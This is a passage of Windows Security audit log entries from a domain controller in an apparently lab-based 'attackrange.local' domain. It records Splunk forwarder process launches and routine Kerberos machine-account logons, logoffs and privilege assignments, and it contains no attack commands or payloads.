- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 03:31:13 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264715
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1590
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:31:14 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264717
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0xfe8
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:31:14 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264716
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0xaa0
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:31:20 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=264719
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Delegation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x859578
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {91CA8262-9E50-FD4E-69C1-B65F14ACC796}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: fe80::4c41:d752:3570:2ca6
Source Port: 53613
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 03:31:20 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=264718
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x859578
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 03:31:21 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=264720
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: ATTACKRANGE\WIN-HOST-797$
Account Name: WIN-HOST-797$
Account Domain: ATTACKRANGE
Logon ID: 0x858153
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 03:31:31 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=264721
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x859578
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 03:31:56 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=264724
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x85A314
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 03:31:56 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=264723
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x85A314
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {D86F149B-DAEC-EE97-650F-2B5A9BD5B8D7}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: ::1
Source Port: 53622
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 03:31:56 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=264722
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x85A314
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 03:32:07 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264725
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x155c
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:32:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264727
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x18dc
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:32:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264726
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1940
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:32:09 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264728
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0xbcc
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:32:13 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264730
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x104c
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:32:13 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264729
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1780
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:32:14 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264731
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x10cc
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:32:23 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=264737
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x85D2A6
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 03:32:23 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=264736
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x85D2A6
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {D86F149B-DAEC-EE97-650F-2B5A9BD5B8D7}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: fe80::4c41:d752:3570:2ca6
Source Port: 53629
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 03:32:23 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=264735
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x85D2A6
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 03:32:23 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=264734
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x85D23A
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 03:32:23 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=264733
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x85D23A
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {D86F149B-DAEC-EE97-650F-2B5A9BD5B8D7}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: fe80::4c41:d752:3570:2ca6
Source Port: 53628
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 03:32:23 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=264732
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x85D23A
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 03:32:56 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=264740
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x85DEA1
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 03:32:56 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=264739
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x85DEA1
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {D86F149B-DAEC-EE97-650F-2B5A9BD5B8D7}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: ::1
Source Port: 53638
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
